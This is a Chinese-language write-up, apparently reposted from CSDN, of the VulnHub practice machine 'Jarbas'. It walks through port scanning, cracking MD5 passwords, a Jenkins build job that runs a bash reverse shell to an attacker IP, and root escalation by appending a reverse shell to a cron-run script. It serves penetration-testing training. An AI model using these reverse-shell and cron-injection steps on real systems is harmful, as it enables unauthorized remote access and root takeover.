欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 财经 > 金融 > vulnhub靶场之Jarbas

vulnhub靶场之Jarbas

2024/10/25 22:22:56 来源:https://blog.csdn.net/weixin_45653478/article/details/140235621  浏览:    关键词:vulnhub靶场之Jarbas

1 信息收集

1.1 主机发现

arp-scan -l

发现主机IP地址为:192.168.1.16

1.2 端口发现

nmap -sS -sV -A -T5 -p- 192.168.1.16

存在端口22,80,3306,8080

1.3 目录扫描

dirsearch -u 192.168.1.16 

2 端口访问

2.1 80端口

2.2 3306端口

2.3 8080端口

2.4 access.html页面

2.5 md5解密

那么我们用 md5 进行解密

italia99

marianna

vipsu

3 漏洞利用

3.1 进入后台

收集到账号和密码进入后台

3.2 构建任务 进行 shell 反弹

创建反弹shell:bash -i &> /dev/tcp/192.168.1.52/1111 0>&1

跟着下面图片的步骤:

注意ip还有端口写上kali的ip和端口

3.3 kali上线

点击立即构建

成功拿到 shell

4 提权

4.1 计划任务

这里提权需要用的是计划任务,计划任务启动调用的是 root 权限,那如果计划任务里面有个反弹命令的话,当它执行的时候,就是 root 权限的会话,那如果我们修改服务器上的计划任务内容,插入恶意语句去让它执行,就能达到目的

cat /etc/crontab

这里有个计划任务,用 root 去执行 cleaningscript.sh 这个文件,每 5 分钟执行一次

那么我们接下来就尝试修改/etc/script/CleaningScript.sh 脚本

cat /etc/script/CleaningScript.sh

可以看见这脚本在执行的是一个删除日志的任务,我们要修改脚本.

ls -l /etc/script

我们可以看到这个文件是可以进行修改权限的

因为是不完全的 shell,我们使用 vim 有限制,我们通过 echo 追加内容

echo "/bin/bash -i >& /dev/tcp/192.168.1.52/6666 0>&1" >> /etc/script/CleaningScript.sh

提权成功

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com